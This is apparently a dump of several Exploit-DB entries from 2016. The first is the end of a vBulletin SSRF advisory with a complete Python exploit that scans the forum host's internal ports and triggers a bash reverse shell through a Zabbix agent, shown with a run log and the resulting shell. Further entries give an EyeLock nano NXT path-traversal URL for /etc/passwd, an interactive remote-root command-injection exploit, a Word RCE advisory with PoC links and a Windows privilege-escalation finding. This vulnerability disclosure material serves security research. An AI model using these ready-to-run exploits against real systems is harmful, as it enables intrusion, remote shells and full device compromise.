These restrictions can be found in core/vb/vurl/curl.php source file:
/**
* Determine if the url is safe to load
*
* @param $urlinfo -- The parsed url info from vB_String::parseUrl -- scheme, port, host
* @return boolean
*/
private function validateUrl($urlinfo)
{
// VBV-11823, only allow http/https schemes
if (!isset($urlinfo['scheme']) OR !in_array(strtolower($urlinfo['scheme']), array('http', 'https')))
{
return false;
}
// VBV-11823, do not allow localhost and 127.0.0.0/8 range by default
if (!isset($urlinfo['host']) OR preg_match('#localhost|127\.(\d)+\.(\d)+\.(\d)+#i', $urlinfo['host']))
{
return false;
}
if (empty($urlinfo['port']))
{
if ($urlinfo['scheme'] == 'https')
{
$urlinfo['port'] = 443;
}
else
{
$urlinfo['port'] = 80;
}
}
// VBV-11823, restrict detination ports to 80 and 443 by default
// allow the admin to override the allowed ports in config.php (in case they have a proxy server they need to go to).
$config = vB::getConfig();
[...]
HTTP redirects are also prohibited however there is one place in the vBulletin
codebase that accepts redirects from the target server specified in a
user-provided link.
The code is used to upload media files within a logged-in user's profile and
can normally be accessed under a path similar to:
http://forum/vBulletin522/member/1-mike/media
By specifying a link to a malicious server that returns a 301 HTTP redirect to
the URL of http://localhost:3306 for example, an attacker could easily
bypass the restrictions presented above and make a connection to mysql/3306
service listening on the localhost.
This introduces a Server Side Request Forgery (SSRF) vulnerability.
As curl is used to fetch remote resources, in addition to HTTP, attackers could
specify a handful of other protocols to interact with local services.
For instance, by sending a redirect to gopher://localhost:11211/datahere
attackers could send arbitrary traffic to memcached service on 11211 port.
Additionally, depending on the temporary directory location configured within
the forum, attackers could potentially view the service responses as the
download function stores responses within temporary files which could be
viewed if the temporary directory is exposed on the web server.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
The exploit code below performs a port scan as well as demonstrates remote
command execution via a popular Zabbix Agent monitoring service which might be
listening on local port of 10050.
The exploit will execute a reverse bash shell on the target if it has the agent
installed and permits remote commands.
The exploit was verified on the following zabbix agent configuration
(/etc/zabbix/zabbix_agentd.conf):
Server=127.0.0.1,::1
EnableRemoteCommands=1
------------[ vBulletin_SSRF_exploit.py ]-----------
'''
#!/usr/bin/python
intro = """
vBulletin <= 5.2.2 SSRF PoC Exploit (portscan / zabbix agent RCE)
This PoC exploits an SSRF vulnerability in vBulletin to scan internal services
installed on the web server that is hosting the vBulletin forum.
After the scan, the exploit also checks for a Zabbix Agent (10050) port and
gives an option to execute a reverse shell (Remote Commands) that will connect
back to the attacker's host on port 8080 by default.
Coded by:
Dawid Golunski
http://legalhackers.com
"""
usage = """
Usage:
The exploit requires that you have an external IP and can start a listener on port 80/443
on the attacking machine.
./vBulletin_SSRF_exploit.py our_external_IP vBulletin_base_url [minimum_port] [maximum_port]
Example invocation that starts listener on 192.168.1.40 (port 80) and scans local ports 1-85
on the remote vBulletin target host:
./vBulletin_SSRF_exploit.py 192.168.1.40 http://vbulletin-target/forum 1 85
Before exploiting Zabbix Agent, start your netcat listener on 8080 port in a separate shell e.g:
nc -vv -l -p 8080
Disclaimer:
For testing purposes only. Do no harm.
SSL/TLS support needs some tuning. For better results, provide HTTP URL to the vBulletin target.
"""
import web # http://webpy.org/installation
import threading
import time
import urllib
import urllib2
import socket
import ssl
import sys
# The listener that will send redirects to the targe
class RedirectServer(threading.Thread):
def run (self):
urls = ('/([0-9a-z_]+)', 'do_local_redir')
app = web.application(urls, globals())
#app.run()
return web.httpserver.runsimple( app.wsgifunc(), ('0.0.0.0', our_port))
class do_local_redir:
def GET(self,whereto):
if whereto == "zabbixcmd_redir":
# code exec
# redirect to gopher://localhost:10050/1system.run[(/bin/bash -c 'nohup bash -i >/dev/tcp/our_ip/shell_port 0<&1 2>&1 &') ; sleep 2s]
return web.HTTPError('301', {'Location': 'gopher://localhost:10050/1system.run%5b(%2Fbin%2Fbash%20-c%20%27nohup%20bash%20-i%20%3E%2Fdev%2Ftcp%2F'+our_ext_ip+'%2F'+str(shell_port)+'%200%3C%261%202%3E%261%20%26%27) %20%3B%20sleep%202s%5d' } )
else:
# internal port connection
return web.HTTPError('301', {'Location': "telnet://localhost:%s/" % whereto} )
def shutdown(code):
print "\nJob done. Exiting"
if redirector_started == 1:
web.httpserver.server.interrupt = KeyboardInterrupt()
exit(code)
# [ Default settings ]
# reverse shell will connect back to port defined below
shell_port = 8080
# Our HTTP redirector/server port (must be 80 or 443 for vBulletin to accept it)
our_port = 443
# How long to wait (seconds) before considering a port to be opened.
# Don't set it too high to avoid service timeout and an incorrect close state
connect_time = 2
# Default port scan range is limited to 20-90 to speed up things when testing,
# feel free to increase maxport to 65535 here or on the command line if you've
# got the time ;)
minport = 20
maxport = 90
# ignore invalid certs (enable if target forum is HTTPS)
#ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# [ Main Meat ]
print intro
redirector_started = 0
if len(sys.argv) < 3 :
print usage
sys.exit(2)
# Set our HTTP Listener/Redirector's external IP
our_ext_ip = sys.argv[1]
try:
socket.inet_aton(our_ext_ip)
except socket.error:
print "Invalid HTTP redirector server IP [%s]!\n" % our_ext_ip
exit(2)
our_server = "http://%s:%s" % (our_ext_ip, our_port)
# Target forum base URL (e.g. http://vulnerable-vbulletin/forum)
targetforum = sys.argv[2]
# Append vulnerable media upload script path to the base URL
targeturl = targetforum.strip('/') + "/link/getlinkdata"
# Change port range (if provided)
if (len(sys.argv) == 5) :
minport = int(sys.argv[3])
# Finish scanning at maxport
maxport = int(sys.argv[4])
# Confirm data
print "\n* Confirm your settings\n"
print "Redirect server to listen on: %s:%s\nTarget vBulletin URL: %s\nScan ports between: %d - %d\n" % (our_ext_ip, our_port, targeturl, minport, maxport)
key = raw_input("Are these settings correct? Hit enter to start the port scan... ")
# Connection check
print "\n* Testing connection to vulnerable script at [%s]\n" % targeturl
req = urllib2.Request(targeturl, data=' ', headers={ 'User-Agent': 'Mozilla/5.0' } )
try:
response = urllib2.urlopen(req, timeout=connect_time).read()
except urllib2.URLError as e:
print "Invalid forum URI / HTTP request failed (reason: %s)\n" % e.reason
shutdown(2)
# Server should return 'invalid_url' string if not url provided in POST
if "invalid_url" not in response:
print """Invalid target url (%s) or restricted access.\n
\nTest with:\n curl -X POST -v %s\nShutting down\n""" % (targeturl, targeturl)
sys.exit(2)
else:
print "Got the right response from the URL. The target looks vulnerable!\n"
# [ Start the listener and perform a port scan ]
print "Let's begin!\n"
print "* Starting our redirect base server on %s:%s \n" % (our_ext_ip, our_port)
RedirectServer().start()
redirector_started = 1
print "* Scanning local ports from %d to %d on [%s] target \n" % (minport, maxport, targetforum)
start = time.time()
opened_ports = []
maxport+=1
for targetport in range(minport, maxport):
#print "\n\nScanning port %d\n" % (targetport)
fetchurl = '%s/%d' % (our_server, targetport)
data = urllib.urlencode({'url' : fetchurl})
req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } )
try:
response = urllib2.urlopen(req, timeout=connect_time)
except urllib2.URLError, e:
print "Oops, url issue? 403 , 404 etc.\n"
except socket.timeout, ssl.SSLError:
print "Conection opened for %d seconds. Port %d is opened!\n" % (connect_time, targetport)
opened_ports.append(targetport)
elapsed = (time.time() - start)
print "\nScanning done in %d seconds. \n\n* Opened ports on the target [%s]: \n" % (elapsed, targetforum)
for listening in opened_ports:
print "Port %d : Opened\n" % listening
print "\nAnything juicy? :)\n"
if 10050 in opened_ports:
print "* Zabbix Agent was found on port 10050 !\n"
# [ Command execution via Zabbix Agent to gain a reverse shell ]
key = raw_input("Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] ")
if key != 'y' :
shutdown(0)
print "\n* Executing reverse shell via Zabbix Agent (10050)."
fetchurl = '%s/%s' % (our_server, 'zabbixcmd_redir')
data = urllib.urlencode({'url' : fetchurl})
req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } )
payload_executed = 0
try:
response = urllib2.urlopen(req, timeout=connect_time)
except urllib2.URLError, e:
print "Oops, url issue? 403 , 404 etc.\n"
except socket.timeout, ssl.SSLError:
# Agent connection remained opened for 2 seconds after the bash payload was sent,
# it looks like the sleep 2s shell command must have got executed sucessfuly
payload_executed = 1
if (payload_executed == 1) :
print "\nLooks like Zabbix Agent executed our bash payload! Check your netcat listening on port %d for shell! :)\n" % shell_port
else:
print "\nNo luck. No Zabbix Agent listening on 10050 port or remote commands are disabled :(\n"
shutdown(0)
'''
----------------------[ eof ]------------------------
Example run:
root@trusty:~/vbexploit# ./vBulletin_SSRF_exploit.py 192.168.57.10 http://192.168.57.10/vBulletin522new/ 20 85
vBulletin <= 5.2.2 SSRF PoC Exploit (Localhost Portscan / Zabbix Agent RCE)
This PoC exploits an SSRF vulnerability in vBulletin to scan internal services
installed on the web server that is hosting the vBulletin forum.
After the scan, the exploit also checks for a Zabbix Agent (10050) port and
gives an option to execute a reverse shell (Remote Commands) that will connect
back to the attacker's host on port 8080 by default.
Coded by:
Dawid Golunski
http://legalhackers.com
* Confirm your settings
Redirect server to listen on: 192.168.57.10:443
Target vBulletin URL: http://192.168.57.10/vBulletin522new/link/getlinkdata
Scan ports between: 20 - 85
Are these settings correct? Hit enter to start the port scan...
* Testing connection to vulnerable script at [http://192.168.57.10/vBulletin522new/link/getlinkdata]
Got the right response from the URL. The target looks vulnerable!
Let's begin!
* Starting our redirect base server on 192.168.57.10:443
* Scanning local ports from 20 to 85 on [http://192.168.57.10/vBulletin522new/] target
http://0.0.0.0:443/
192.168.57.10:58675 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /20" - 301
192.168.57.10:58679 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /21" - 301
192.168.57.10:58683 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /22" - 301
Conection opened for 2 seconds. Port 22 is opened!
192.168.57.10:58686 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /23" - 301
192.168.57.10:58690 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /24" - 301
192.168.57.10:58694 - - [30/Jul/2016 03:00:28] "HTTP/1.1 GET /25" - 301
Conection opened for 2 seconds. Port 25 is opened!
192.168.57.10:58697 - - [30/Jul/2016 03:00:30] "HTTP/1.1 GET /26" - 301
[...]
192.168.57.10:58909 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /79" - 301
192.168.57.10:58913 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /80" - 301
Conection opened for 2 seconds. Port 80 is opened!
192.168.57.10:58917 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /81" - 301
192.168.57.10:58921 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /82" - 301
192.168.57.10:58925 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /83" - 301
192.168.57.10:58929 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /84" - 301
192.168.57.10:58933 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /85" - 301
Scanning done in 14 seconds.
* Opened ports on the target [http://192.168.57.10/vBulletin522new/]:
Port 22 : Opened
Port 25 : Opened
Port 80 : Opened
Anything juicy? :)
Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] y
* Executing reverse shell via Zabbix Agent (10050).
192.168.57.10:58940 - - [30/Jul/2016 03:00:45] "HTTP/1.1 GET /zabbixcmd_redir" - 301
Looks like Zabbix Agent executed our bash payload! Check your netcat listening on port 8080 for shell! :)
Job done. Exiting
Here is how the netcat session looks like after a sucessful exploitation:
$ nc -vvv -l -p 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [192.168.57.10] port 8080 [tcp/*] accepted (family 2, sport 54259)
zabbix@trusty:/$ id
id
uid=122(zabbix) gid=129(zabbix) groups=129(zabbix)
zabbix@trusty:/$
As we can see reverse shell was executed on the target which sucessfully
connected back to the attacker's netcat listener.
VI. BUSINESS IMPACT
-------------------------
The vulnerability can expose internal services running on the server/within
the local network.
If not patched, unauthenticated attackers or automated scanners searching for
vulnerable servers could send malicious data to internal services.
Depending on services in use, the impact could range from sensitive information
disclosure, sending spam, DoS/data loss to code execution as demonstrated by
the PoC exploit in this advisory.
VII. SYSTEMS AFFECTED
-------------------------
All vBulletin forums in all branches (5.x, 4.x , 3.x) without the latest patches
named in the next section are affected by this vulnerability.
VIII. SOLUTION
-------------------------
Upon this advisory, vendor has published the following security releases of
vBulletin for each of the affected branches:
vBulletin 5.2.3
vBulletin 4.2.4 Beta
vBulletin 3.8.10 Beta
Separate patches have also been released (see references below).
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6483
vBulletin patches:
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349551-security-patch-vbulletin-5-2-0-5-2-1-5-2-2
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349549-security-patch-vbulletin-4-2-2-4-2-3-4-2-4-beta
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349548-security-patch-vbulletin-3-8-7-3-8-8-3-8-9-3-8-10-beta
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
05.08.2016 - final advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''

55
platforms/php/webapps/40227.txt Executable file
View file

@ -0,0 +1,55 @@
EyeLock nano NXT 3.5 Local File Disclosure Vulnerability
Vendor: EyeLock, LLC
Product web page: http://www.eyelock.com
Affected version: NXT Firmware: 3.05.1193 (ICM: 3.5.1)
NXT Firmware: 3.04.1108 (ICM: 3.4.13)
NXT Firmware: 3.03.944 (ICM: 3.3.2)
NXT Firmware: 3.01.646 (ICM: 3.1.13)
Platform: Hardware (Biometric Iris Reader (master))
Summary: Nano NXT is the most advanced compact iris-based identity authentication device
in Eyelock's comprehensive suite of end-to-end identity authentication solutions.
Nano NXT is a miniaturized iris-based recognition system capable of providing
real-time identification, both in-motion and at a distance. The Nano NXT is an
ideal replacement for card-based systems, and seamlessly controls access to turnstiles,
secured entrances, server rooms and any other physical space. Similarly the device
is powerful and compact enough to secure high-value transactions, critical databases,
network workstations or any other information system.
Desc: nano NXT suffers from a file disclosure vulnerability when input passed thru the
'path' parameter to 'logdownload.php' script is not properly verified before being used
to read files. This can be exploited to disclose contents of files from local resources.
==================================================================================
/scripts/logdownload.php:
-------------------------
1: <?php
2: header("Content-Type: application/octet-stream");
3: header("Content-Disposition: attachment; filename={$_GET['dlfilename']}");
4: readfile($_GET['path']);
5: ?>
==================================================================================
Tested on: GNU/Linux (armv7l)
lighttpd/1.4.35
SQLite/3.8.7.2
PHP/5.6.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5356
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5356.php
10.06.2016
--
http://192.168.40.1/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd

179
platforms/php/webapps/40228.py Executable file
View file

@ -0,0 +1,179 @@
#!/usr/bin/env python
#
#
# EyeLock nano NXT 3.5 Remote Root Exploit
#
#
# Vendor: EyeLock, LLC
# Product web page: http://www.eyelock.com
# Affected version: NXT Firmware: 3.05.1193 (ICM: 3.5.1)
# NXT Firmware: 3.04.1108 (ICM: 3.4.13)
# NXT Firmware: 3.03.944 (ICM: 3.3.2)
# NXT Firmware: 3.01.646 (ICM: 3.1.13)
#
# Platform: Hardware (Biometric Iris Reader (master))
#
# EyeLock is an advanced iris authentication and recognition solutions company
# focused on developing next-generation systems for global access control and identity
# management.
#
# Summary: nano NXT® - the next generation of EyeLocks revolutionary access
# control solutions. nano NXT renders all other access control peripherals
# obsolete by revolutionizing how identities are protected, authenticated,
# and managed. With a sleek low profile and powerful capabilities, the nano
# NXT redefines the future of access control. An optional SDK is available
# to customers who want to customize their security solutions to integrate
# seamlessly with existing applications. The nano NXT authenticates up to 20
# people per minute, in-motion and at-a-distance with unparalleled accuracy.
# nano NXT can be used in a variety of environments including commercial/enterprise,
# corrections, data centers, education, financial services, government, healthcare
# facilities and hospitality.
#
# Nano NXT is the most advanced compact iris-based identity authentication device
# in Eyelock's comprehensive suite of end-to-end identity authentication solutions.
# Nano NXT is a miniaturized iris-based recognition system capable of providing
# real-time identification, both in-motion and at a distance. The Nano NXT is an
# ideal replacement for card-based systems, and seamlessly controls access to turnstiles,
# secured entrances, server rooms and any other physical space. Similarly the device
# is powerful and compact enough to secure high-value transactions, critical databases,
# network workstations or any other information system.
#
# Desc: EyeLock's nano NXT firmware latest version 3.5 (released 25.07.2016) suffers
# from multiple unauthenticated command injection vulnerabilities. The issue lies
# within the 'rpc.php' script located in the '/scripts' directory and can be triggered
# when user supplied input is not correctly sanitized while updating the local time for
# the device and/or get info from remote time server. The vulnerable script has two REQUEST
# parameters 'timeserver' and 'localtime' that are called within a shell_exec() function
# for setting the local time and the hardware clock of the device. An attacker can exploit
# these conditions gaining full system (root) access and execute OS commands on the affected
# device by injecting special characters to the affected parameters and further bypass
# the access control in place.
#
# Hint: Plenty other RCE bugs are present in the rpc.php and others (like: uploadCertificate.php,
# upgrade.php, WebConfig.php, firmwareupdate.php, interfaceeditor.php, etc.)
#
# =============================================================================
# /scripts/rpc.php:
# -----------------
# 9: if (isset($_REQUEST['action']))
# 10: {
# 11: switch($_REQUEST['action'])
# ...
# ...
# 181: case 'updatetime':
# 182: {
# 183: // do something, the put our response in the response field...
# 184: $strDate = shell_exec("rdate -s {$_REQUEST['timeserver']} 2>&1");
# 185:
# 186: // set the hardware clock.
# 187: $strResult = shell_exec("/sbin/hwclock -w"); // Does no harm to call this even on failure...
# 188:
# 189: $strtheDate = shell_exec("date 2>&1");
# 190:
# 191: echo "updatetime|{$strDate}|{$strtheDate}";
# 192:
# 193: break;
# 194: }
# 195:
# 196: case 'updatelocaltime':
# 197: {
# 198: // do something, the put our response in the response field...
# 199: $strDate = shell_exec("date -s '{$_REQUEST['localtime']}' 2>&1");
# 200:
# 201: // set the hardware clock
# 202: $strResult = shell_exec("/sbin/hwclock -w"); // Does no harm to call this even on failure...
# 203:
# 204: $strtheDate = shell_exec("date 2>&1");
# 205:
# 206: echo "updatelocaltime|{$strDate}|{$strtheDate}";
# 207:
# 208: break;
# 209: }
# =============================================================================
#
# -----------------------------------------------------------------------------
# Master: 192.168.40.1
# Slave: 192.168.40.2
#
# $ eyelock.py 192.168.40.1
#
# root@192.168.40.1:~# id
# uid=0(root) gid=0(root)
#
# root@192.168.40.1:~# cat /home/root/knockd.conf
# [options]
# logfile = /var/log/knockd.log
#
# [openSSH]
# sequence = 1973,1975,2013
# seq_timeout = 15
# command = /usr/sbin/iptables -D INPUT -p tcp --dport 22 -j DROP
# tcpflags = syn
#
# [closeSSH]
# sequence = 91,85,70
# seq_timeout = 5
# command = /usr/sbin/iptables -A INPUT -p tcp --dport 22 -j DROP
# tcpflags = syn
#
#
# root@192.168.40.1:~# exit
#
# $
# -----------------------------------------------------------------------------
#
#
# Tested on: GNU/Linux (armv7l)
# lighttpd/1.4.35
# SQLite/3.8.7.2
# PHP/5.6.6
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2016-5357
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5357.php
#
#
# 10.06.2016
#
import re,sys,os
import requests
piton = os.path.basename(sys.argv[0])
print '''
---------------------------------------------------------
EyeLock nano NXT <=3.5 [Open Sesame] Remote Root Exploit
Zero Science Lab - http://zeroscience.mk
ZSL-2016-5357
---------------------------------------------------------
'''
if len(sys.argv) < 2:
print '\n\x20\x20[*] Usage: '+piton+' <ipaddress>\n'
sys.exit()
ipaddr = sys.argv[1]
print
while True:
try:
cmd = raw_input('root@'+ipaddr+':~# ')
# http://EyelockNxtMasterIP/scripts/rpc.php?action=updatelocaltime&localtime=%26whoami%26
execute = requests.get('http://'+ipaddr+'/scripts/rpc.php?action=updatetime&timeserver=||'+cmd)
pattern = re.compile(r'updatetime\|(.*?)\|',re.S|re.M)
cmdout = pattern.match(execute.text)
print cmdout.groups()[0].strip()
print
if cmd.strip() == 'exit':
break
except Exception:
break
sys.exit()

59
platforms/windows/dos/40224.txt Executable file
View file

@ -0,0 +1,59 @@
#####################################################################################
# Application: Microsoft Office Word
# Platforms: Windows, OSX
# Versions: Microsoft Office Word 2007,2010,2013,2016
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @SebMorin1, @COSIG_
# Date: August 09, 2016
# CVE: CVE-2016-3313
# COSIG-2016-31
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#######################################################################################
===================
1) Introduction
===================
Microsoft Word is a word processor developed by Microsoft. It was first released on October 25, 1983[3] under the name Multi-Tool Word for Xenix systems.[4][5][6] Subsequent versions were later written for several other platforms including IBM PCs running DOS (1983), Apple Macintosh running Mac OS (1985), AT&T Unix PC (1985), Atari ST (1988), OS/2 (1989), Microsoft Windows (1989) and SCO Unix (1994). Commercial versions of Word are licensed as a standalone product or as a component of Microsoft Office, Windows RT or the discontinued Microsoft Works suite. Microsoft Word Viewer and Office Online are Freeware editions of Word with limited features.
(https://en.wikipedia.org/wiki/Microsoft_Word)
#######################################################################################
===================
2) Report Timeline
===================
2016-05-15: Sébastien Morin of COSIG report the vulnerability to MSRC.
2016-06-07: MSRC confirm the vulnerability
2016-08-09: Microsoft fixed the issue (MS16-099).
2016-08-09: Advisory released.
#######################################################################################
===================
3) Technical details
===================
This vulnerability allow remote code execution if a user opens a specially crafted Microsoft Office Word (.doc) with an invalid WordDocumentStream.
An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user.
#######################################################################################
==========
4) POC
==========
https://smsecurity.net/wp-content/uploads/2016/08/COSIG-2016-31.doc
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40224.zip
#######################################################################################

54
platforms/windows/local/40226.txt Executable file
View file

@ -0,0 +1,54 @@
EyeLock Myris 3.3.2 SDK Service Unquoted Service Path Privilege Escalation
Vendor: EyeLock, LLC
Product web page: http://www.eyelock.com
Affected version: 3.3.21289.1311
Summary: myris® provides unparalleled security, is portable, lightweight
and is as easy as looking in a mirror. Use myris to quickly and easily
enroll users for EyeLocks access control products or to grant users
access to corporate domain environments within seconds—users never have
to type their username and password again.
Desc: The application suffers from an unquoted search path issue impacting
the service 'MyrisService' for Windows deployed as part of Myris solution.
This could potentially allow an authorized but non-privileged local user to
execute arbitrary code with elevated privileges on the system. A successful
attempt would require the local user to be able to insert their code in the
system root path undetected by the OS or other security applications where
it could potentially be executed during application startup or reboot. If
successful, the local users code would execute with the elevated privileges
of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5355
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5355.php
10.06.2016
--
C:\Users\joxy>sc qc MyrisService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MyrisService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Eyelock Corporation\MyrisSDK\bin\MyrisService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Myris SDK Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem